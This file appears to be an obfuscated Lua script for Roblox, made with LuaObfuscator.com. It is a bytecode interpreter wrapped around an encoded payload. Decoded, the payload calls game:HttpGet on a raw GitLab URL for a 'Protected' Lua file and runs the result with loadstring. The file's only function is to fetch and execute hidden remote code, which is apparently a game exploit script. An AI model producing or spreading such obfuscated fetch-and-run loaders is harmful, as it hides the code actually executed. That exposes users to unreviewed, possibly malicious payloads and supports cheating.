--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v105=0;local v106;while true do if (v105==1) then return v106;end if (v105==0) then v106=v5(v84,v19);v19=nil;v105=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -0)) then v86=(v31/((3 -1)^(v32-(2 -(878 -(282 + 595))))))%((621 -(555 + (1701 -(1523 + 114))))^(((v33-1) -(v32-(1 + 0))) + (932 -(857 + 74)))) ;return v86-(v86%1) ;end end else local v87=(570 -(367 + 201))^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or ((1065 -(68 + 997)) + 0) ;end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + (202 -117))) ;v34=958 -((1648 -756) + 65) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (3 -1) ;return (v37 * (188 + 68)) + v36 ;end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12211951 + 4565265)) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end if ((952 -(802 + 150))==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -(1191 -(1069 + 118))) );v18=v18 + (4 -0) ;v38=1;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((3 -1)==v43) then v48=v20(v45,4 + 17 ,54 -23 );v49=((v20(v45,32 + 0 )==(792 -(368 + 423))) and  -(3 -2)) or 1 ;v43=21 -(10 + 8) ;end if (v43==3) then if (v48==((0 + 0) -0)) then if (v47==((1327 -(261 + 624)) -(416 + 26))) then return v49 * (0 -0) ;else local v107=0 + (0 -0) ;while true do if (v107==(1080 -(1020 + 60))) then v48=1 -0 ;v46=0;break;end end end elseif (v48==(2485 -(145 + 293))) then return ((v47==(430 -((1467 -(630 + 793)) + 386))) and (v49 * (1/(1486 -(998 + 488))))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/((1 + 1)^(43 + 9)))) ;end if (v43==(772 -(201 + 571))) then v44=v23();v45=v23();v43=1139 -(116 + 1022) ;end if (v43==(4 -3)) then v46=1 + 0 ;v47=(v20(v45,(9 -6) -2 ,71 -51 ) * (((4076 -3215) -(814 + 45))^(78 -46))) + v44 ;v43=1 + 1 ;end end end local function v25(v50) local v51=0 + 0 ;local v52;local v53;while true do if (v51==(9 -6)) then return v6(v53);end if (v51==(1749 -((3345 -2585) + 987))) then v53={};for v94=(1737 + 177) -(1789 + 124) , #v52 do v53[v94]=v2(v1(v3(v52,v94,v94)));end v51=769 -(745 + 21) ;end if (v51==(0 + (0 -0))) then v52=nil;if  not v50 then local v104=0 -0 ;while true do if (v104==0) then v50=v23();if (v50==(0 -0)) then return "";end break;end end end v51=1 + 0 ;end if (v51==(1 + 0)) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=1057 -(87 + 968) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 1943 -(1008 + 935) ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54~=(157 -(142 + 14))) then else local v91=(function() return 0;end)();while true do if (v91~=1) then else v61=(function() return {};end)();for v108= #"~",v60 do local v109=(function() return 0;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==1) then v112=(function() return nil;end)();while true do if (v110==(1793 -(1563 + 230))) then v111=(function() return v21();end)();v112=(function() return nil;end)();v110=(function() return 286 -(134 + 151) ;end)();end if (v110==1) then if (v111== #"~") then v112=(function() return v21()~=(1665 -(970 + 695)) ;end)();elseif (v111==2) then v112=(function() return v24();end)();elseif (v111~= #"19(") then else v112=(function() return v25();end)();end v61[v108]=(function() return v112;end)();break;end end break;end if (v109~=(0 -0)) then else v110=(function() return 0;end)();v111=(function() return nil;end)();v109=(function() return 1991 -(582 + 1408) ;end)();end end end v91=(function() return 6 -4 ;end)();end if (2~=v91) then else v54=(function() return 2;end)();break;end if (v91==(0 -0)) then v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v91=(function() return 1825 -(1195 + 629) ;end)();end end end if (v54==(0 -0)) then local v92=(function() return 241 -(187 + 54) ;end)();while true do if ((780 -(162 + 618))==v92) then v55=(function() return function(v113,v114,v115) local v116=(function() return 0 + 0 ;end)();local v117=(function() return;end)();while true do if (v116==0) then v117=(function() return 0;end)();while true do if (v117==(0 + 0)) then local v171=(function() return 0;end)();while true do if (v171~=(0 -0)) then else v113[v114-#":" ]=(function() return v115();end)();return v113,v114,v115;end end end end break;end end end;end)();v56=(function() return {};end)();v92=(function() return 1 -0 ;end)();end if ((1 + 1)~=v92) then else v54=(function() return 1;end)();break;end if (v92==1) then v57=(function() return {};end)();v58=(function() return {};end)();v92=(function() return 2;end)();end end end if (v54==(1638 -(1373 + 263))) then v59[ #"nil"]=(function() return v21();end)();for v96= #"}",v23() do local v97=(function() return 0;end)();local v98=(function() return;end)();while true do if (v97~=(1000 -(451 + 549))) then else v98=(function() return v21();end)();if (v20(v98, #"|", #":")==(0 + 0)) then local v131=(function() return 0;end)();local v132=(function() return;end)();local v133=(function() return;end)();local v134=(function() return;end)();while true do if ((4 -1)==v131) then if (v20(v133, #"nil", #"gha")~= #"!") then else v134[ #"http"]=(function() return v61[v134[ #"asd1"]];end)();end v56[v96]=(function() return v134;end)();break;end if (v131==1) then local v167=(function() return 0;end)();while true do if (v167==(1 -0)) then v131=(function() return 2;end)();break;end if ((1384 -(746 + 638))==v167) then v134=(function() return {v22(),v22(),nil,nil};end)();if (v132==(0 -0)) then local v176=(function() return 341 -(218 + 123) ;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 1581 -(1535 + 46) ;end)();while true do if (v177==(0 + 0)) then v134[ #"nil"]=(function() return v22();end)();v134[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v132== #">") then v134[ #"91("]=(function() return v23();end)();elseif (v132==2) then v134[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();elseif (v132== #"asd") then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=(560 -(306 + 254))) then else v183=(function() return 0;end)();while true do if (v183==0) then v134[ #"91("]=(function() return v23() -((1 + 1)^(30 -14)) ;end)();v134[ #"0313"]=(function() return v22();end)();break;end end break;end end end v167=(function() return 1;end)();end end end if (2~=v131) then else if (v20(v133, #".", #",")== #"<") then v134[2]=(function() return v61[v134[1469 -(899 + 568) ]];end)();end if (v20(v133,2,2 + 0 )== #".") then v134[ #"nil"]=(function() return v61[v134[ #"xnx"]];end)();end v131=(function() return 7 -4 ;end)();end if ((603 -(268 + 335))==v131) then local v168=(function() return 0;end)();local v169=(function() return;end)();while true do if (v168~=(290 -(60 + 230))) then else v169=(function() return 572 -(426 + 146) ;end)();while true do if (v169==(0 + 0)) then v132=(function() return v20(v98,1458 -(282 + 1174) , #"asd");end)();v133=(function() return v20(v98, #"xnxx",6);end)();v169=(function() return 812 -(569 + 242) ;end)();end if (v169==(2 -1)) then v131=(function() return 1;end)();break;end end break;end end end end end break;end end end for v99= #".",v23() do v57,v99,v28=(function() return v55(v57,v99,v28);end)();end return v59;end end end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[2];local v67=v62[1027 -(706 + 318) ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1252 -(721 + 530) ;local v73= -(378 -(142 + 235));local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v88=0 + 0 ,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + (701 -(271 + 429)) ];else v78[v88]=v75[v88 + 1 + 0 ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1501 -(1408 + 92) ];if ((2996>=2654) and (v81<=(1090 -((2091 -1630) + 625)))) then if (v81<=((281 + 1008) -(993 + 295))) then if ((3978>2104) and (v81>(0 + 0))) then local v118=v80[1173 -(418 + 383 + 370) ];local v119,v120=v71(v78[v118](v13(v78,v118 + 1 + 0 ,v80[1 + 2 ])));v73=(v120 + v118) -(1 + 0) ;local v121=0 + 0 ;for v135=v118,v73 do v121=v121 + (530 -(406 + 123)) ;v78[v135]=v119[v121];end else local v122=v80[1771 -(1749 + 20) ];local v123=v78[v80[1 + 0 + 2 ]];v78[v122 + 1 ]=v123;v78[v122]=v123[v80[1326 -(1249 + (137 -64)) ]];end elseif ((2995>1541) and (v81<=(1 + 1))) then v78[v80[(1011 + 136) -(466 + 679) ]]={};elseif ((3249>953) and (v81>((15 -9) -3))) then do return;end else local v138;local v139,v140;local v141;local v142;v78[v80[(12 -7) -3 ]]={};v72=v72 + (1901 -(106 + 1794)) ;v80=v68[v72];v78[v80[1 + 1 ]]=v64[v80[(1552 -(1126 + 425)) + 2 ]];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[5 -3 ]]=v64[v80[117 -(4 + 110) ]];v72=v72 + (585 -(57 + 523 + 4)) ;v80=v68[v72];v142=v80[1429 -(41 + 1386) ];v141=v78[v80[3]];v78[v142 + (104 -(17 + 86)) ]=v141;v78[v142]=v141[v80[3 + 1 ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[(2 + 1) -1 ]]=v80[8 -(3 + 2) ];v72=v72 + (167 -(70 + 52 + (449 -(118 + 287)))) ;v80=v68[v72];v78[v80[(4 -2) -0 ]]=v80[9 -6 ]~=(0 + 0) ;v72=v72 + 1 + 0 ;v80=v68[v72];v142=v80[3 -1 ];v139,v140=v71(v78[v142](v13(v78,v142 + (66 -((83 -53) + 35)) ,v80[3])));v73=(v140 + v142) -(1 + 0) ;v138=0 -0 ;for v163=v142,v73 do v138=v138 + (1258 -(1043 + 214)) ;v78[v163]=v139[v138];end v72=v72 + ((6 -3) -2) ;v80=v68[v72];v142=v80[1214 -(323 + 889) ];v78[v142]=v78[v142](v13(v78,v142 + 1 ,v73));v72=v72 + ((1 + 1) -1) ;v80=v68[v72];v78[v80[582 -(361 + 219) ]]();v72=v72 + (321 -(53 + 267)) ;v80=v68[v72];do return;end end elseif (v81<=(2 + 4)) then if (v81==(418 -(15 + 398))) then v78[v80[984 -(18 + (2085 -(118 + 1003))) ]]=v64[v80[11 -8 ]];else v78[v80[2 + 0 ]]=v80[2 + 1 ]~=(850 -(20 + 830)) ;end elseif ((v81<=(6 + (4 -3))) or (3273>4573)) then v78[v80[128 -(116 + 10) ]]();elseif (v81>8) then local v159=v80[1 + (2 -1) ];v78[v159]=v78[v159](v13(v78,v159 + 1 ,v73));else v78[v80[755 -(239 + 514) ]]=v80[741 -(542 + 69 + 127) ];end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403563Q00682Q7470733A2Q2F6769746C61622E636F6D2F4433617468466561746865722F5363726970742F7261772F6D61696E2F50726F7465637465645F3031622Q6537653Q343831642Q63372Q633465373137362E6C7561000A4Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
